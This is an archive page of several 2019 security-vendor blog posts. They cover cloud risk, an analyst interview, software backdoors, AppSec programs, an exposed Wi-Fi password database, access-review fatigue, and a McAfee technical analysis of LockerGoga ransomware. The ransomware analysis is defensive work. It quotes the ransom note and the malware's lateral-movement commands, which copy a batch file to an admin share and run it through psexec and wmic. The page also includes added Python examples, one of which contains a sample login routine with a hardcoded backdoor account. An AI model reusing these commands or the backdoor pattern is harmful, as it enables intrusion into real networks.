Monthly Archives: April 2019

Test Your Knowledge on Cloud Adoption and Risks

Our data lives in the cloud, and nearly a quarter of it is sensitive enough to require protection to limit our risk. You won’t get far in your transformation to the cloud without learning where cloud data risk comes from and how to navigate around it.

In our latest Cloud Adoption and Risk Report, we analyze the types of sensitive data in the cloud and how it’s shared, examine IaaS security and adoption trends, and review common threats in the cloud. Test your knowledge on the latest cloud trends and see if your enterprise understands the basics of cloud-related risks.

Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Cloud Adoption and Risk Report 2019

Blog: Cloud Security Risks – It’s not black and white

MVISION Cloud Data Sheet

MVISION Cloud


The post Test Your Knowledge on Cloud Adoption and Risks appeared first on McAfee Blogs.

Behind the Screens: An Interview with Trystan Orr

Cybersecurity is best approached holistically, by combining human, physical, and technical efforts to mitigate threats. But how exactly does the human element play a role? To grasp just how humans and psychology are central to the cybersecurity industry, we spoke to our very own Security Operations Center Analyst, Trystan Orr.

Q:  How did you first become interested in cybersecurity?

A:  I’ve been interested in technology since I was very young—I was introduced to computers and video games early.  But there was no particular turning point that got me into cybersecurity; it was more of a slow realization.  I took a couple of coding courses in high school and really liked them.  Then, in college, I took a security class and received my Security+ certification.  I really enjoyed just how pervasive security is: in anything you do, you have to consider security.

“At the same time, I started to notice a strong correlation between psychology and security. It’s about the way humans interact with the technology, and that’s why cybersecurity hit a note with me. Humans can be your greatest risk, and your greatest strength.”

Q:  How do you apply your understanding of psychology to your job as a security analyst?

A:  One of the key parts of my job as an analyst is thinking of the business need that accompanies security initiatives.  For example, when a security alert is triggered, you have to think about the people behind the screens that triggered the alert.  This is where psychology comes in.  Once you have an understanding of who they are and what they’re doing in their day-to-day, you can respond to the alert.  You don’t want to suggest something that slows down the business, or stops the user from doing what they need to do.

Understanding the user, the human, allows us to offer these custom solutions.

Q:  Looking ahead a few years, what do you predict will be the next big change in the industry?

A:  Awareness.  I think people are becoming more aware of security, which is exciting to see.  For instance, users are becoming more aware of phishing and the importance of reporting potential phishing emails.

“I think part of this increased awareness is a shift from thinking of cybersecurity as a purely technological problem, to a human problem as well.  Users are starting to see the role they play in cybersecurity.” 

Q:  What do you see as the value of encouraging women to enter the industry?

A:  I think including more women in the industry brings different viewpoints that are valuable in discussion and problem-solving. It’s becoming much more apparent that you have to have different people and different personalities to be effective. If you have a different viewpoint, you also have different experiences backing up that viewpoint.

This is especially important in security; you have to be able to have open discussions about how certain security measures affect the user’s risk and productivity.  The goal is to understand what’s best for the user in order to offer the best solution.  This is best achieved when a variety of different viewpoints are brought to the table.

Q:  What advice do you have for anyone interested in entering the cybersecurity industry?

A:  When I first started in the industry as an intern, I didn’t have a security background.  I understood what was going on, but there was a lot I didn’t know. I realized that you must be completely unafraid to ask questions—before you start a new job or internship, and then throughout the entire time you’re there.

There’s a lot you can learn on your own too.  If you are even a little interested, you don’t have to pay loads of money to learn more about the industry.  Always be motivated and open to new ways you can learn.

To hear from more inspiring women in cybersecurity, check out our series.

The post Behind the Screens: An Interview with Trystan Orr appeared first on GRA Quantum.

Learning From the Vodafone-Huawei Backdoor Scandal


Yesterday, Bloomberg reported that Vodafone uncovered hidden backdoors in Huawei equipment used for the carrier’s Italian business, which could have given Huawei unauthorized access to Italian homes and businesses. The alleged backdoors were found in 2011 and 2012, and Vodafone told Bloomberg that the issues were resolved at the time.

However, the BBC published a piece this morning in which Vodafone denied the Bloomberg report, citing a spokesperson who says that, "The 'backdoor' that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet.”

The spokesperson further said that Bloomberg was incorrect in stating that Huawei could have had unauthorized access to the carrier’s Italian network, and that Vodafone has no evidence of any unauthorized access.

According to the BBC, Vodafone has paused deployment of Huawei equipment in its core networks until certain issues are resolved, chiefly the accusation that Huawei is controlled by the Chinese government, which could pose a security risk. The US has encouraged allies not to use the equipment in 5G networks, with Secretary of State Mike Pompeo saying the U.S. wouldn't be able to work with nations using the Chinese technology.

What’s the Deal with Backdoors?

Backdoors are a method of bypassing authentication or other security controls in order to access a computer system or the data it holds. They can exist at the system level, in a cryptographic algorithm, or within an application. Some backdoors are included in software intentionally (for example, as a vendor’s maintenance or support access); they still pose a serious threat if discovered by the wrong people.

According to a paper from Veracode CTO Chris Wysopal and Veracode Chief Research Officer Chris Eng, backdoored software enables attackers to gain access to highly secure systems that are otherwise rigorously locked down and monitored. The network traffic to and from an application backdoor will most often look like typical usage of the networked application.

For instance, an attacker using backdoored blog software will generate traffic that looks like the ordinary web traffic of a blog user, so a network intrusion detection system has nothing anomalous to flag. And since the backdoored software was installed by the system operator and is otherwise legitimate, it will typically pass anti-virus protection as well.

Some developers will place backdoors in the source code of software they have legitimate access to simply because it is a challenge and because they can. They may have no initial intention of compromising the systems where the software will be installed, but take the opportunity in case they want to use the backdoor in the future.
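The application-backdoor pattern the paper describes, an undocumented credential check buried in otherwise legitimate code, is exactly what source-level analysis is well placed to catch, because the backdoor is invisible on the network but plain in the code. The following is an added example, not Veracode’s scanner and not code from the Wysopal/Eng paper: a small AST-based check in Python that flags any comparison of a credential-looking variable against a string literal, run against a constructed vulnerable login routine and its hardened counterpart. The credential-name hints, the sample sources and the check_login function are assumptions made for the illustration.

```python
import ast

# Identifier fragments that suggest a variable holds a credential.
# Heuristic chosen for this example; extend it per code base.
CREDENTIAL_HINTS = ("password", "passwd", "pwd", "secret", "token", "user", "apikey", "api_key")


def _is_credential_name(node):
    """True for a Name or Attribute whose identifier looks credential-like."""
    if isinstance(node, ast.Name):
        ident = node.id
    elif isinstance(node, ast.Attribute):
        ident = node.attr
    else:
        return False
    ident = ident.lower()
    return any(hint in ident for hint in CREDENTIAL_HINTS)


class _HardcodedCredentialVisitor(ast.NodeVisitor):
    """Walks the tree, tracking the enclosing function so findings can be
    attributed to the routine that contains the suspicious comparison."""

    def __init__(self):
        self.scope = []      # stack of enclosing function names
        self.findings = []   # (lineno, function, literal)

    def visit_FunctionDef(self, node):
        self.scope.append(node.name)
        self.generic_visit(node)
        self.scope.pop()

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Compare(self, node):
        operands = [node.left, *node.comparators]
        # Only fire when one side is credential-like and the other is a
        # non-empty string literal: `password == "l3tm3in"` style checks.
        if any(_is_credential_name(op) for op in operands):
            for op in operands:
                if isinstance(op, ast.Constant) and isinstance(op.value, str) and op.value:
                    func = self.scope[-1] if self.scope else "<module>"
                    self.findings.append((node.lineno, func, op.value))
        self.generic_visit(node)


def find_hardcoded_credential_checks(source):
    """Return (lineno, function, literal) for every comparison of a
    credential-looking value against a non-empty string literal."""
    visitor = _HardcodedCredentialVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


# Constructed sample: a login routine with a hidden "support" account.
VULNERABLE_SOURCE = '''\
import hashlib

def check_login(username, password, users):
    # Undocumented "support" account: a classic application backdoor.
    if username == "support" and password == "l3tm3in":
        return True
    user = users.get(username)
    return user is not None and hashlib.sha256(password.encode()).hexdigest() == user["hash"]
'''

# Constructed sample: the same routine with the backdoor removed and a
# salted, constant-time comparison against the stored hash.
HARDENED_SOURCE = '''\
import hashlib, hmac

def check_login(username, password, users):
    user = users.get(username)
    if user is None:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), user["salt"], 200_000)
    # Constant-time comparison against the stored hash; no literal credentials anywhere.
    return hmac.compare_digest(digest, user["hash"])
'''


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_SOURCE), ("hardened", HARDENED_SOURCE)):
        print(name, find_hardcoded_credential_checks(src))
```

The check deliberately ignores comparisons against None or an empty string, and it does not try to follow data flow, so a literal stored in a constant and compared later will slip past it; a production analyzer tracks that flow, which is the gap between this sketch and a real static-analysis engine.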

Companies like Apple have publicly refused to build backdoors into their products, going as far as designing their hardware without any third-party access path, to ensure an acceptable level of protection for users and their personal information.

Curious to find out if you have backdoors in your code? Get in touch so we can help.

Your AppSec Program Can Make Your Developers and Your CFO Happy


While cybersecurity risk is steadily growing, so too is the recognition that application security (AppSec) is critical to protecting valuable enterprise resources. More than ever, a program that spans the entire SDLC is critical to preventing breaches of your organization’s and your customers’ data. Just as it is important to inventory and secure all of the applications in your portfolio, it’s equally important that your applications are coded securely. Let’s be real: there are a few ways that shifting your application security program left can go wrong, including purchasing solutions that don’t really fit the needs of your organization, failing to determine which flaws need fixing first in order to avoid a breach, and measuring success against the wrong metrics. This can cost you valuable resources, including your developers’ time and energy and your clients’ trust, and incite the ire of your organization’s CFO.

Here are three tips for running a developer-friendly AppSec program that saves your organization’s most precious resources.

Create Strong Application Security Policies

You know how you treat each email you receive with varying levels of attention and detail? The same sort of policies should be implemented when it comes to fixing flaws found in your software. Like any tool or methodology, AppSec requires a strong structural framework to deliver maximum results. A broadly defined and unfocused program, and the absence of strong AppSec policies, can lead to teams chasing down every flaw and fix. Essentially, you’re running the risk of overwhelming your developers who will no longer have the time or energy to take threats seriously.

There is no one-size-fits-all framework when it comes to creating application security policy (here’s a guide to get you started). It’s really a matter of setting the bar at the right risk and protection level, determining which flaws really matter, understanding remediation and mitigation, and keeping an eye on third-party applications and open source components. Focusing on AppSec standards, like OWASP Top 10, and balancing the needs of your organization will position you for maximum performance and protection, and help you avoid developer burnout.

Identify Appropriate Metrics

The right set of metrics and key performance indicators (KPIs) can greatly simplify and streamline both your software development and your application security. There are a few metrics to consider beyond meeting your organization’s policy requirements. For example, organizations that have adopted Agile and DevSecOps will find themselves scanning applications and code more frequently. This kind of scanning, when automated through integration with development systems and run at the points best aligned with the development team’s workflow, can limit the number of vulnerabilities that reach the testing and production stages. Higher scan frequency also goes along with a lower mean time to remediate (MTTR): Veracode’s State of Software Security Volume 9 found that development teams who scanned 300 or more times per year fixed flaws 11.5x faster than other organizations.

Another metric to consider is flaw density: the number of flaws found by static analysis divided by the size of the application, which gives directional guidance when comparing groups of applications. A high flaw density simply means more flaws to address, and shows where AppSec resources are best spent and how to prioritize flaws. The beauty of a developer-friendly AppSec program is that it decreases flaw density over time. The Total Economic Impact™ of the Veracode Application Security Platform, a Forrester Consulting study, shows that prior to using Veracode, the composite organization experienced 60 flaws per MB of code. After adopting the Veracode platform and integrating its tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50% to 90% over three years.

Ensuring that your team has access to actionable results from all application security testing scans performed in a single platform makes coordinating remediation between security, development, and other IT teams easier and more efficient. It also simplifies your ability to measure against the metrics and KPIs set for your organization. To learn more about how to measure your AppSec program, check out the Everything You Need to Know About Measuring Your AppSec Program guide.

Select the Right Solutions

When it comes to AppSec, you need a combination of solutions to ensure that you’re securing your applications at every stage – that’s right, there’s still no silver bullet in security. In the Forrester Consulting study, the organizations interviewed used the Veracode Platform to build stringent security controls and integrate application security testing into their CI/CD pipeline. In addition to using Veracode Static Analysis and Veracode Dynamic Analysis, these organizations shifted security left using Veracode Greenlight and Veracode Software Composition Analysis to identify issues at inception in the SDLC.

As a result, they found that developers were introducing fewer flaws to their code and that the flaws they did find took less time to resolve because we are able to offer contextual remediation advice for those security flaws. Since security flaws were caught earlier in the SDLC, the organization saw a 90 percent reduction in time required to resolve these flaws. Resolutions which previously took 2.5 hours on average were reduced to 15 minutes.

With MTTR included in your overall metrics, it’s important that your application security solutions are designed for speed AND a low false positive rate. This means that security and development teams will spend less time sorting through results to find actual vulnerabilities, and spend more time fixing what matters so that they can move on to other projects.

Developing an AppSec Road Map Saves Time and Money

Organizations need to conduct security testing at the speed of modern day software development in order to maintain tight product roadmap deadlines and increase speed to market. When your teams take the time to understand the bigger picture, the solutions that they need to get the job done well and done efficiently, and they’re able to save time and money doing it, everybody wins. Your development teams will have the space to make your next standout product or feature. You will have the resources to invest in furthering their development education. Your applications will be more secure and your entire organization will be the better for it.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, was recently left exposed, leaving a database containing over 2 million network passwords unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. It also let users upload the Wi-Fi passwords stored on their devices to its database for others to use. That database was left exposed without authentication, so anyone could access and download its contents. Each record contained the Wi-Fi network name, its precise geolocation, its basic service set identifier (BSSID, the access point’s hardware address), and the network password in plaintext. Because the app didn’t require users to obtain permission from the network owner, many of the entries were home and business networks whose owners had no idea their password had been shared. With the password and the location in hand, an attacker can join the network and from there attempt to reach the router’s administration interface, which is often still protected only by default credentials, and change settings such as DNS to point unsuspecting users to malicious websites. What’s more, once on the network a threat actor can read any traffic that isn’t itself encrypted (for example with TLS), allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What is Rubber Stamping and Why is it a Serious Cybersecurity Concern?

Although it is not common practice these days to use the red “APPROVED” physical ink stamp, the act of bulk approving (or denying) requests without the necessary time invested or research conducted is as popular as ever. Though this can occur in any department across any organization, this practice of rubber-stamping is particularly problematic when related to the review of access to IT resources. Bulk approvals of requests to have access to any of the various systems and assets quickly becomes a security concern. In order to avoid giving into the temptation to rush approvals of these requests without adequate review, organizations must first understand the damage that can result from overusing approvals, why it happens, and how this can be prevented.

The Dangers of Too Much Access

User access and how it is managed greatly impacts the risk of insider threats, which have become all too common. In fact, according to a survey completed by Cybersecurity Insiders, over 50 percent of organizations surveyed experienced an insider attack in the last twelve months. Approving everyone for any access they apply for, or not adequately reviewing user access periodically, provides ample opportunity for both malicious and accidental insider threats.

Dissatisfied employees pose a unique risk given their knowledge of the organization and their sometimes nefarious motivations. If they know the approval process is not being monitored or access is not being periodically reviewed, they could easily submit a request to access sensitive data which they could then misuse. It could take months before their activity was discovered.

Accidental or negligent misuse of access is also considered an insider threat. Employees may not understand exactly what access they need and end up asking for and being approved for more privilege than they require; they may even request access to the wrong system or asset entirely. The result is often errors in how the access is used. Failing to govern exactly who is asking for what and why they need it creates an environment primed for increased errors.

Additionally, limiting user access is a key component of many regulations like GDPR, Sarbanes Oxley (SOX), and HIPAA, whether it be through the application of proper approval processes or the periodic review of access. Frequent rubber stamping could result in being out of compliance, opening your organization up to potential fines, or worse.

Certification Fatigue and Information Underload: Why Rubber Stamping Occurs

Approving entitlements without a second glance is dangerous. So why is it so common?

Firstly, those in charge of approving access requests or periodically reviewing large lists of user entitlements are often inundated with them, causing certification fatigue. In order to get through the list and get back to work, they simply grant them all. Essentially, they may be busy enough that the only type of access review or approval that will happen in a timely manner is a careless one.

Secondly, access reviews especially are often presented in a confusing format, or an unreadable one. Spreadsheets with this information are hard to read and may not provide enough context to determine if the existing access is actually needed. There are several considerations which may not be listed in a spreadsheet, like how commonly the type of access requested is granted for a given job role, or if it is only needed for a limited time or purpose. With potentially hundreds of requests in need of action, it’s impractical to expect a reviewer or approver to take the time to research each request.

Ultimately, these kinds of reviews require a human eye and a clear understanding of the context in which the access is requested or has been granted. A balance must be struck between efficiency, accuracy, and security. As long as this process is manual, and without improvements in the way the data are presented to the reviewer, accuracy is a difficult goal to achieve.
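One concrete way to supply the missing context is peer-group analysis: compare each user’s entitlements against what other users in the same job role hold, and surface only the grants that are unusual for that role, so the reviewer’s attention goes to the handful of outliers instead of the hundreds of routine rows. The following is an added example, not Core Security’s product or its algorithm. It uses constructed review data with assumed role and entitlement names, and it treats roles with too few members as a case where prevalence tells you nothing, routing those grants to manual review rather than silently treating them as common.

```python
from collections import defaultdict

# Constructed sample access-review data: (user, job role, entitlement). Not real data.
ENTITLEMENTS = [
    ("alice", "accounts-payable", "erp.invoice.read"),
    ("alice", "accounts-payable", "erp.invoice.approve"),
    ("bob",   "accounts-payable", "erp.invoice.read"),
    ("bob",   "accounts-payable", "erp.invoice.approve"),
    ("carol", "accounts-payable", "erp.invoice.read"),
    ("carol", "accounts-payable", "erp.invoice.approve"),
    ("dave",  "accounts-payable", "erp.invoice.read"),
    ("dave",  "accounts-payable", "erp.invoice.approve"),
    ("dave",  "accounts-payable", "erp.vendor.bank-details.write"),  # nobody else in the role has this
    ("erin",  "accounts-payable", "erp.invoice.read"),
    ("frank", "sysadmin", "ad.domain-admins"),
    ("grace", "sysadmin", "ad.domain-admins"),
]


def peer_group_outliers(records, threshold=0.25, min_peers=3):
    """Flag entitlements that are unusual for the holder's role.

    For each (role, entitlement) pair, prevalence = members of the role who hold
    it / members of the role.  Grants below `threshold` are outliers.  A role with
    fewer than `min_peers` members gives no meaningful baseline, so every grant in
    it goes to manual review instead of being rubber-stamped as 'common'.
    Returns (user, role, entitlement, prevalence, reason), rarest first."""
    members = defaultdict(set)   # role -> users in that role
    holders = defaultdict(set)   # (role, entitlement) -> users holding it
    for user, role, ent in records:
        members[role].add(user)
        holders[(role, ent)].add(user)

    flagged = []
    for (role, ent), users in holders.items():
        n = len(members[role])
        prevalence = len(users) / n
        if n < min_peers:
            reason = f"peer group too small ({n} < {min_peers}); review manually"
        elif prevalence < threshold:
            reason = f"held by only {len(users)} of {n} users in role"
        else:
            continue
        for user in sorted(users):
            flagged.append((user, role, ent, round(prevalence, 2), reason))
    flagged.sort(key=lambda r: (r[3], r[1], r[0]))
    return flagged


def review_queue(records, **kwargs):
    """Split a review into grants that need a human decision and grants that are
    routine for the role, so the reviewer's limited attention lands on the former."""
    needs_review = {(u, r, e) for u, r, e, _, _ in peer_group_outliers(records, **kwargs)}
    attention = [rec for rec in records if rec in needs_review]
    routine = [rec for rec in records if rec not in needs_review]
    return attention, routine


if __name__ == "__main__":
    for row in peer_group_outliers(ENTITLEMENTS):
        print(row)
```

On the sample data the only true outlier is Dave’s write access to vendor bank details, held by one of five people in the role; the two sysadmin grants are flagged not because they are rare but because a two-person peer group cannot establish what is normal. Tuning threshold and min_peers to the organization is the part that needs a human, and a solution should show the prevalence alongside each row so the reviewer can see why it was flagged.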

Providing Access Accurately and Safely with a Certification Solution

Core Certify provides the context approvers need to make an informed decision in a visual format that allows users to clearly and quickly see common user entitlements and rapidly identify outliers. Core Certify works as a standalone solution, or as part of a suite that enables an organization to also take a graphic approach to periodic or ad-hoc access reviews.

In addition, the same visual, context-driven approach is available for role creation. To see it for yourself, as well as the rest of the Visual Identity Suite, get a personalized demo today.


How Veracode Security Program Managers Benefit Your AppSec Program

The application security space is a complicated environment with a vast landscape of roles, development methodologies, and tech stacks. Developers, security leads, risk analysts, Scrum masters, vendor managers, operations teams, and system architects are all on the scene, just to name a few. 

If we compare the land of AppSec to the agriculture industry, your Veracode Security Program Managers are the farmers, and secure software is our crop. Our calloused hands are dirty with application security, and we thrive on lending our green thumb to your program, so you can achieve your security and organizational goals. 

This summer marks my two-year tenure as a Veracode Security Program Manager. I support about 30 different customer organizations in the Eastern US, and I specialize in scaling new application security initiatives into best-in-class programs. We are all about delivering value here at Veracode, and I wanted to shed some light on how Security Program Managers can help guide you on your AppSec journey.

We’re Here For You

Whether you need us for one hour per month, or 16 hours a week, we’ve got your back. We are a part of the larger Services team within Veracode, and we’re proud of it. Some of us support 250 customers, some of us support three customers, and most of us are somewhere in between. Regardless of your level of service, you will always be partnered with a Veracode Security Program Manager to help you succeed.

As Security Program Managers, most of our time is spent communicating with our customers. Although Veracode may be one tool in your program, we understand how the solution fits into your larger security landscape, and we are experts in the space. Internally, we share what works (and what doesn’t work) with each other to fine tune our best-practice methods.   

We’re an Extension of Your Team

Although we are process and workflow wizards, there may be times when we don’t have the answer to your questions right away. However, we usually know who will. Veracode Security Program Managers act on your behalf as corporate liaisons, and we’re not shy about asking for help when we don’t know something.           

Throughout the life of your program, you’ll work with us to identify organizational challenges, program goals, and success metrics. The combination of these tools and our programmatic approach holds you and your team accountable. Need help integrating Veracode results into your SIEM or want to discuss the best way to manage your CI/CD pipeline? We know some people.   

We Help You Achieve Security as a Competitive Advantage

Kick-off calls, platform demos, status calls, and program review meetings equip us with visibility into the health of your program. These touchpoints, combined with a blend of analytics, strategic expertise, and a shared passion for efficiency, are the base to our secret sauce for your success. We’re obsessed with helping you lessen your risk of failure and saving you money, all while enabling your organization to become more secure as a competitive advantage.

Your Veracode Security Program Manager will have insight into our newest programs and resources to help you achieve your security goals. Lean on us to help you discover a list of your applications that already qualify for the free Veracode Verified program. We’ll also keep you up to speed on our latest and greatest free webinars, which are released on a monthly basis. Becoming familiar with your program enables us to send you content tailored to your initiatives. Let us dig through the noise and send you the right resources.

We Evolve With You

The pressure to produce more code more quickly will only compound over time. Veracode Security Program Managers are here to ensure your great software is also secure, all while helping you move fast. While speed is top of mind for us, accuracy is built into our DNA. As a team, we are passionate about staying ahead of emerging market changes and the latest technology trends.   

We know how to leverage our enhanced Veracode Analytics tool in the platform to gain immediate insight into your program to identify potential risk, areas to improve, and strategic next steps. We can also help you learn how to create and share custom reports that are meaningful to both you and your business. 

Your organization is working hard to create software that’s changing the world; lean on a Veracode Security Program Manager as a trusted advisor to help secure it. Together, we can plant the seeds for bold innovations and pioneer new discoveries.     

Check out our website, to learn more about our Services organization.

LockerGoga Ransomware Family Used in Targeted Attacks

Initial discovery

Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new features to the tried and true formula of encrypting victims’ files and asking for payment to decrypt them, has gained notoriety for the targets it has affected.

In this blog, we will look at the findings of the McAfee ATR team following analysis of several different samples. We will describe how this new ransomware works and detail how enterprises can protect themselves from this threat.

Technical analysis

LockerGoga exhibits some interesting behaviors we want to highlight. Based on our research, it has a few functions and capabilities that are rare among ransomware families with similar objectives and/or targeted sectors.

To uncover its capabilities, we analyzed all the samples we found, noting the similarities between them and how the development lifecycle adds or modifies features in the code, evolving the ransomware into a more professional tool for the group behind it.

One of the main differences between LockerGoga and other ransomware families is that it spawns multiple processes to carry out file encryption on the system:

Like other ransomware, LockerGoga consumes all the available CPU resources on the system, as we observed on our test machines:

Most of the LockerGoga samples work the same way but we observed how they added and removed certain types of functionality during their development lifecycle.

The ransomware needs to be executed from a privileged account.

LockerGoga works in a master/slave configuration. The malware begins its infection on an endpoint by installing a copy of itself in the %TEMP% folder.

After being copied, it will start a new process with the -m parameter.

The master process runs with the -m parameter and is responsible for creating the list of files to encrypt and spawning the slaves.

The slave processes are executed with a different set of parameters, as shown below. Each slave process encrypts only a small number of files, to avoid the heuristic detections available in endpoint security products. The list of files to encrypt is handed from the master process to the slaves via IPC, specifically a named section (a file-mapping object that both processes map into memory), a standard Windows mechanism for sharing data between processes. The section is named SM-<name of binary>.

Here is the IPC technique used by LockerGoga:

  • The master process (run as <LockerGogaBinary> -m) creates a named section on the system for IPC.
  • The section is named “SM-tgytutrc”.
  • The master ransomware process posts the filepath of the file to be encrypted to the named section “SM-tgytutrc”.
  • This section is used by the slave processes to pick up the filepath and encrypt the target file.

Sandbox replication of master process screenshot below showing:

  • Creation of the named section.
  • Subsequent creation of slave processes to encrypt target files on the endpoint.

Sandbox replication of slave process (encryption process) below showing:

  • Obtaining access to the section created by the master process.
  • Reading and encryption of a target file found based on the filepath specified in the named section.

The ransomware creates multiple slave processes on the endpoint to encrypt files. Some analysts believe this is the case simply because it speeds up the encryption process, but we are not convinced as the same outcome can be achieved via a multi-threaded approach in the ransomware process instead of a multi-process approach.

Instead, we suspect this approach is adopted for the following reasons:

  • Footprint: If every encryption process encrypts only a small number of files on the endpoint and then terminates, the overall footprint of the attack on the system decreases, since it may be difficult to correlate multiple encryption processes to the same threat.
  • Sandbox bypass: Some sandbox-based detection systems monitor a threshold on the number of files written on the system and may correlate it with the file extensions being written. For example, if a process reads, say, 200 files in the sandbox but only creates files with one specific extension (typical of ransomware; “.locked” in the case of LockerGoga), that can be considered anomalous behavior. Spreading the work across many short-lived processes may let LockerGoga stay under such thresholds.
  • File I/O based detection bypass: A multi-process approach keeps the amount of I/O (file/disk I/O etc.) generated by each encryption process within a certain limit, thus evading detection techniques that look for exorbitant I/O from a single process.
  • Reliability: Even if one encryption process is manually terminated by an end-user, as long as the master ransomware process is running the files will continue to be encrypted by new slave processes. If the ransomware process does not use the multi-process approach, then terminating the ransomware process stops the encryption on the endpoint.

Username Administrator:

Username Tinba:

The author implemented a logging function that can be enabled by executing the sample with the parameter “-l”; it stores all the results in a file called ‘log.txt’ in the root of the C: drive:

During execution we enabled the log function and saw how the ransomware encrypts the system, causing high CPU usage and opening the ransom note during the process. This is how an infected system looks:

As we executed the sample with the log function enabled, we could read this file to check the status of the encryption. This is most likely a debug function used by the developer.

With the help of the log function, we could establish the order in which LockerGoga encrypts the system:

  • Log file creation in the C: drive
  • Folder and file enumeration
  • File encryption & ransom note creation in the desktop folder.

One interesting thing to mention is that, before encrypting any other file on the system, the malware searches the Recycle Bin folder first. We are not certain why it takes this unusual step, though it could be because many people do not empty their recycle bins and the ransomware is looking to encrypt even those files that may no longer be required:

LockerGoga then enumerates all the folders and files on the system to start the encryption process. This enumeration is done in parallel, so the process is not expected to take much time.

After the enumeration the ransomware will create the ransom note for the victim:

The ransom note was created in parallel with the encrypted files, and it is hardcoded inside the sample:

Like other ransomware families, LockerGoga will create the ransom note file to ask the user to pay to recover their encrypted files. We highly recommend not paying under any circumstance so as not to continue funding an underground business model. In case of a ransomware infection, please check https://www.nomoreransom.org

Below is an example of the ransom note content on an infected machine:

Greetings!
There was a significant flaw in the security system of your company.
You should be thankful that the flaw was exploited by serious people and not some rookies.
They would have damaged all of your data by mistake or for fun.

Your files are encrypted with the strongest military algorithms RSA4096 and AES-256.
Without our special decoder it is impossible to restore the data.
Attempts to restore your data with third party software as Photorec, RannohDecryptor etc. will lead to irreversible destruction of your data.

To confirm our honest intentions.
Send us 2-3 different random files and you will get them decrypted.
It can be from different computers on your network to be sure that our decoder decrypts everything.
Sample files we unlock for free (files should not be related to any kind of backups).

We exclusively have decryption software for your situation

DO NOT RESET OR SHUTDOWN – files may be damaged.
DO NOT RENAME the encrypted files.
DO NOT MOVE the encrypted files.
This may lead to the impossibility of recovery of the certain files.

The payment has to be made in Bitcoins.
The final price depends on how fast you contact us.
As soon as we receive the payment you will get the decryption tool and instructions on how to improve your systems security

To get information on the price of the decoder contact us at:

In parallel with the ransom note creation, LockerGoga starts encrypting files, appending the .locked extension to each one. This extension has been broadly used by other ransomware families in the past:

The file extensions that LockerGoga will encrypt are embedded in the code. Below is an example:

The sample also has some locations and files configured to be skipped during the encryption process so as not to stop the Operating System from running.

All the files encrypted by this ransomware will have a specific FileMarker inside:

Note: The FileMarker identifies the ransomware family and, most likely, the version; in this case it is 1440.

During the investigation we identified the following versions:

  • 1200
  • 1510
  • 1440
  • 1320

Based on the binary compile time and the extracted versions, we observed that the actors were creating different versions of LockerGoga for different targets/campaigns.

After encrypting, LockerGoga executes ‘cipher.exe’ to wipe the free space and prevent file recovery on the infected system. When files are deleted on a system, their contents sometimes remain in the free space of the hard disk and can theoretically be recovered.

Samples digitally signed:

During our triage phase we found that some of the LockerGoga samples are digitally signed. ATR is observing that the latest ransomware families used at a smaller scale and in more focused campaigns are released digitally signed, in this case with certificates issued to:

  • MIKL LIMITED
  • ALISA LTD
  • KITTY’S LTD

Digitally signing the malware could help the attackers to bypass some of the security protections in the system.

As part of the infection process, LockerGoga will create a static mutex value in the system, always following the same format:

MX-[a-z]\w+

Examples of mutex found:

MX-imtvknqq

MX-tgytutrc

MX-zzbdrimp

Interesting strings found

In our analysis we extracted more strings from the LockerGoga samples, with interesting references to:

  • LockerGoga
  • crypto-locker
  • goga
  • E:\\crypto-locker\\cryptopp\\src\\crc_simd.cpp
  • E:\\crypto-locker\\cryptopp\\src\\rijndael_simd.cpp
  • E:\\crypto-locker\\cryptopp\\src\\sha_simd.cpp
  • E:\\crypto-locker\\cryptopp\\src\\sse_simd.cpp
  • E:\\goga\\cryptopp\\src\\crc_simd.cpp
  • E:\\goga\\cryptopp\\src\\rijndael_simd.cpp
  • E:\\goga\\cryptopp\\src\\sha_simd.cpp
  • E:\\goga\\cryptopp\\src\\sse_simd.cpp
  • X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\crc_simd.cpp
  • X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\rijndael_simd.cpp
  • X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sha_simd.cpp
  • X:\\work\\Projects\\LockerGoga\\cl-src-last\\cryptopp\\src\\sse_simd.cpp

The malware developers usually forget to remove those strings in their samples and we can use them to identify new families or frameworks used in their development.

Spreading methods:

The malware is known to be spread across the local network through remote file copy. To do that, a set of .bat files is copied to the remote machine's TEMP folder using a simple copy command:

  • copy xax.bat \\123.123.123.123\c$\windows\temp

The malware will copy itself and the tool PSEXEC.EXE to the same location. Once all the files are copied, the .BAT file is run using the following command:

  • start psexec.exe \\123.123.123.123 -u domain\user -p "pass" -d -h -r mstdc -s accepteula -nobanner c:\windows\temp\xax.bat

Each of these .BAT files contains lines to execute the malware on remote machines. They use the following command:

  • start wmic /node:"123.123.123.123" /user:"domain\user" /password:"pass" process call create "cmd /c c:\windows\temp\kill.bat"

